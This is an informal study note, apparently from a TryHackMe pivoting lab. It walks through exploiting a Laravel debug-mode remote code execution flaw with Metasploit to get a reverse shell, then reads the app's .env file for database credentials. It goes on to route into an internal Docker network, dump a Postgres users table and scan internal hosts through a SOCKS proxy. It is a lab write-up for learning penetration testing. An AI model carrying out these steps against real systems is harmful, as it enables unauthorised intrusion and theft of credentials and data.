Pivoting - HackMD

# Pivoting ###### tags: `tryhackme` `metasploit` `pivoting` [TOC] --- https://www.youtube.com/watch?v=mZqNP2fOLlk&t=2672s ## Nmap ``` nmap 10.10.32.27 -sC -sV -F ``` - -sC:default script - -sV:detect service - -F: scan default specific port ![](https://i.imgur.com/vb9LMOD.png) INFO - apache 2.5.54 --- ## Ping host ``` ping 10.10.32.27 ``` ![](https://i.imgur.com/HDLoK4n.png) INFO - ttl=64 ->Linux (host) - ttl=128 -> windows(host) --- ## Open browser ``` firefox 10.10.32.27 ``` ![](https://i.imgur.com/6MxulkF.png) INFO - Laravel v8.26.1 (PHP v7.4.30) --- ## Find Exploit (Local Database) ``` searchsploit laravel ``` ![](https://i.imgur.com/2xbgIep.png) --- ``` searchsploit laravel 8 ``` ![](https://i.imgur.com/S7l9MHX.png) - Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py //RCE --- Metasploit (module exploit framework) - auxiliary(scanning module) ``` msf6 > search laravel ``` ![](https://i.imgur.com/fQicXO6.png) ``` info exploit/multi/php/ignition_laravel_debug_rce ``` or ``` info 1 ``` --- Using the module ``` use 1 ``` or ``` use exploit/multi/php/ignition_laravel_debug_rce ``` ![](https://i.imgur.com/Nx58zLf.png) ``` msf6 exploit(multi/php/ignition_laravel_debug_rce) > set RHOSTS 10.10.32.27 ``` --- Automatically check ``` msf6 exploit(multi/php/ignition_laravel_debug_rce) > check ``` ![](https://i.imgur.com/K1Ak2wy.png) --- ``` msf6 exploit(multi/php/ignition_laravel_debug_rce) > show targets ``` ![](https://i.imgur.com/CE85uWa.png) --- ``` show options ``` ![](https://i.imgur.com/0d03Hc6.png) --- ``` msf6 exploit(multi/php/ignition_laravel_debug_rce) > set LHOST eth0 ``` - eth0 (Locatl network interface Super hacker Www ``` exploit ``` ![](https://i.imgur.com/DY5YM4K.png) --- ``` id ``` ![](https://i.imgur.com/vFoFflq.png) ![](https://i.imgur.com/dCpZyZd.png) - user:www-data We're in !!!!!!! (awesome fantastic --- ## Upgrade Our Reverse Shell () ``` background ``` Let current reverse shell run in the background --- show our current sessions ``` sessions ``` --- upgrade to supper shell(meterpreter) ``` sessions -u 1 ``` ![](https://i.imgur.com/cSPQE3z.png) ![](https://i.imgur.com/UNliCWQ.png) --- ## Interate our supper shell ``` sessions -i 2 ``` ![](https://i.imgur.com/Dvpo8Te.png) ``` help ``` ![](https://i.imgur.com/cyDYX8K.png) ![](https://i.imgur.com/xYH0Rlz.png) ![](https://i.imgur.com/FX518nL.png) Recommend: Take some time to familiar with meterpreter BY cyber security expert (It's very powerful and funny) ``` getuid //whoami ``` ![](https://i.imgur.com/Ke6HSmh.png) ``` getpid //current proccess ``` ![](https://i.imgur.com/SC4bkWL.png) ``` ps //aux ``` ![](https://i.imgur.com/pgpc0Vk.png) --- In side docker container we need to find DB credential to access DB ``` shell ``` ``` env ``` ``` cd /var/www ``` ![](https://i.imgur.com/nt4EOR1.png) ``` cat .env ``` ![](https://i.imgur.com/UxyNM9B.png) DNS Resolve ``` resolve webservice_database ``` ![](https://i.imgur.com/gxGu38P.png) save session 2 ``` background ``` ## Router Adding router to session 2 (metepreter) ``` route add 172.28.101.51/32 2 ``` ``` route add 172.17.0.1/32 2 ``` ![](https://i.imgur.com/BChOBiS.png) --- Try to access DB ``` search postgre ``` id 16 'schema' ->dump DB information ![](https://i.imgur.com/IUETk53.png) Result ![](https://i.imgur.com/ZyzALwD.png) Try to execute sql query ![](https://i.imgur.com/vxKmQ83.png) ``` use 11 ``` ``` info ``` ``` set RHOST 172.28.101.51 ``` ``` set DATABASE postgres ``` ``` set SQL "select * from users" ``` ``` exploit ``` ![](https://i.imgur.com/FzZizxA.png) --- ## Socks proxy ``` search socks ``` ![](https://i.imgur.com/4Zw9LHM.png) ``` use 0 ``` ``` exploit ``` ``` jobs //jobs -l (kill the proccess ) ``` Local host ``` curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1 ``` ![](https://i.imgur.com/kY9uv7A.png) ``` proxychains -h ``` ``` vim /etc/proxychains4.conf ``` socks5 127.0.0.1 1080 ``` proxychains curl http://172.17.0.1 ``` --- Scanning ``` proxychains nmap -sV -sT -F -Pn 172.17.0.1 ``` ![](https://i.imgur.com/VCLggwf.png)